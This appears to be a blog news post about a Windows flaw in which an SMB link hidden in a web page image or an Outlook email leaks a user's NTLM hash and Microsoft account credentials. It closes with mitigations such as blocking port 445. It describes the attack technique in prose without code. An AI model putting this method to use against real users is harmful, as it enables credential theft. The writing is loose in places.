An earlier security flaw in Windows permits the hacker to steal the username and password of Windows users. The hackers can do this by only by fooling the user into visiting a web pages containing malware. But now it became much easier. Because Windows 8 and onward allow the user to log into Windows using his/her Microsoft account.
Flaw was known since 1997:
This security flaw was supposedly known in 1997 by Aron Spangler. Most recently in 2015 by researcher at Black Hat (An annual security and hacking conference in Las Vegas). This security flaw was not considered too important to fix until the Windows 8 came into action. Windows 8 permits the users to sign into Microsoft accounts. This new feature in Windows 8 allows the users to link their Outlook, Xbox, Hotmail, Skype and Microsoft Visual Studio among others.
Security Flaw triggers when victim uses IE, Edge or Outlook
This flaw can only be triggered when the user is using Internet explorer or Microsoft Edge browsers. After entering the account credentials the user tries to login into his/her account. The Windows proceeds to authenticate the user’s information and now the attacker can trick the user in visiting their own network shares instead of Microsoft’s. They do this by opening a webpage in Either Internet Explorer or Microsoft Edge and silently moving data to it.
User’s password in Windows is encrypted through NTLM hash and according to the researchers it can be easily cracked.
This flaw can also be triggered by sending a mail to user’s Outlook account which will trick the user to reveal his/her account password.
A virtual private networking provider known as Perfect Privacy reveals in a their blog that if the user is using a VPN then there is no threat to lose his/her Windows credentials but the VPN username and password might be in hacker’s hands. So from this we can say that this flaw also violate the VPN user’s anonymity on the internet.
How it works? Some technical overview!
Malicious link embedding:
The exploit can be triggered when the attacker embeds a link to an SMB resource inside a malicious web page. It can also be triggered from an email which is viewed by the victim through Outlook. The malicious link can hide the link from user inside an image tag. But instead of opening the original image, that link can drive user’s data to attacker’s network share which is hosted on his own network.
How to stay safe from this flaw?
There are couple of solutions to to avoid this security flaw
You can stay safe by this attack by blocking the port# 445, in Windows Firewall which will stop all the outgoing SMB connections except the local connections.
But the optimal solution for this problem would be if you disconnect from your Microsoft account and switch back to account for logging into your Windows PC.
I tried my best to cover this news from all aspect, but if you have any questions to ask you are more than welcome! And if you like this post don’t forget to share it!